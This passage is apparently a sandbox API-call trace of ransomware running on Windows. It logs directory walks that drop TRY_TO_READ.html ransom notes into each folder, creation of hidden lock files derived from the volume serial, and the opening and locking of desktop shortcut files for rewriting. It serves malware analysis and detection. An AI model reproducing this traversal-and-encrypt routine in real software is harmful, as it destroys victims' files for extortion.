ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", cAlternateFileName="{929FB~1.210")) returned 1 [0122.462] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0122.463] FindNextFileW (in: hFindFile=0x48f130, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a199880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", cAlternateFileName="{A749D~1.210")) returned 1 [0122.463] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0122.464] FindNextFileW (in: hFindFile=0x48f130, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", cAlternateFileName="{B1755~1.610")) returned 1 [0122.465] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0122.467] FindNextFileW (in: hFindFile=0x48f130, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd7d760, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", cAlternateFileName="{BD95A~1.610")) returned 1 [0122.467] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0122.468] FindNextFileW (in: hFindFile=0x48f130, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfaaff840, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfaaff840, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", cAlternateFileName="{CA675~1")) returned 1 [0122.468] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0122.472] FindNextFileW (in: hFindFile=0x48f130, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfab71c60, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabbdf20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabbdf20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", cAlternateFileName="{CF2BE~1.610")) returned 1 [0122.472] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0122.477] FindNextFileW (in: hFindFile=0x48f130, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa93425b0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa9368710, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa9368710, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", cAlternateFileName="{E5127~1.250")) returned 1 [0122.477] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0122.479] FindNextFileW (in: hFindFile=0x48f130, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa912d270, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa912d270, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{e52a6842-b0ac-476e-b48f-378a97a67346}", cAlternateFileName="{E52A6~1")) returned 1 [0122.479] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0122.481] FindNextFileW (in: hFindFile=0x48f130, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcad7040, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcad7040, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", cAlternateFileName="{E6E75~1")) returned 1 [0122.481] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0122.484] FindNextFileW (in: hFindFile=0x48f130, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf93efac0, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf93efac0, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{f325f05b-f963-4640-a43b-c8a494cdda0f}", cAlternateFileName="{F325F~1")) returned 1 [0122.484] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0122.488] FindNextFileW (in: hFindFile=0x48f130, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 1 [0122.488] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0122.490] FindNextFileW (in: hFindFile=0x48f130, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 0 [0122.490] CloseHandle (hObject=0x3cc) returned 1 [0122.490] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.490] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x1, wMilliseconds=0x361)) [0122.490] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0122.491] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0122.491] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0122.491] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\All Users\\Start Menu9c354ca09c354b444c.lock") returned 53 [0122.491] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Start Menu9c354ca09c354b444c.lock" (normalized: "c:\\users\\all users\\start menu9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0122.491] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.491] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.491] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x45b798 [0122.492] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Start Menu\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 0xffffffff [0122.492] CloseHandle (hObject=0x3cc) returned 1 [0122.492] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.492] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x1, wMilliseconds=0x361)) [0122.492] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0122.492] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0122.492] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0122.492] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\All Users\\Sun9c354ca09c354b444c.lock") returned 46 [0122.493] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Sun9c354ca09c354b444c.lock" (normalized: "c:\\users\\all users\\sun9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0122.493] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.493] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.493] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4b4b40 [0122.493] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Sun\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x32944fb0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32944fb0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48f170 [0122.493] FindNextFileW (in: hFindFile=0x48f170, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x32944fb0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32944fb0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.494] FindNextFileW (in: hFindFile=0x48f170, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0122.494] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Sun\\Java\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\sun\\java\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e0 [0122.495] FindNextFileW (in: hFindFile=0x48f170, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x32944fb0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x32944fb0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32944fb0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0122.495] FindNextFileW (in: hFindFile=0x48f170, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x32944fb0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x32944fb0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32944fb0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0122.495] CloseHandle (hObject=0x3cc) returned 1 [0122.495] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.495] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x1, wMilliseconds=0x370)) [0122.495] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0122.495] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0122.496] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0122.496] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\All Users\\Templates9c354ca09c354b444c.lock") returned 52 [0122.496] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Templates9c354ca09c354b444c.lock" (normalized: "c:\\users\\all users\\templates9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0122.496] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.496] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.496] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4b4dc8 [0122.496] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Templates\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x32944fb0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x32944fb0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32944fb0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0122.497] CloseHandle (hObject=0x3cc) returned 1 [0122.497] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.497] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x1, wMilliseconds=0x370)) [0122.497] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0122.497] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0122.497] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0122.497] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\Public\\Desktop9c354ca09c354b444c.lock") returned 47 [0122.497] CreateFileW (lpFileName="C:\\\\Users\\Public\\Desktop9c354ca09c354b444c.lock" (normalized: "c:\\users\\public\\desktop9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0122.498] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.498] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.498] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4b4b88 [0122.498] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Desktop\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x328f8cf0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328f8cf0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48f1b0 [0122.498] FindNextFileW (in: hFindFile=0x48f1b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x328f8cf0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328f8cf0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.498] FindNextFileW (in: hFindFile=0x48f1b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83c279c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83c279c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83c4db20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x7e9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe Reader X.lnk", cAlternateFileName="ADOBER~1.LNK")) returned 1 [0122.498] CreateFileW (lpFileName="C:\\\\Users\\Public\\Desktop\\Adobe Reader X.lnk" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4e4 [0122.499] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.499] LockFile (hFile=0x4e4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x7e9, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.499] SetFilePointerEx (in: hFile=0x4e4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0122.499] ReadFile (in: hFile=0x4e4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: 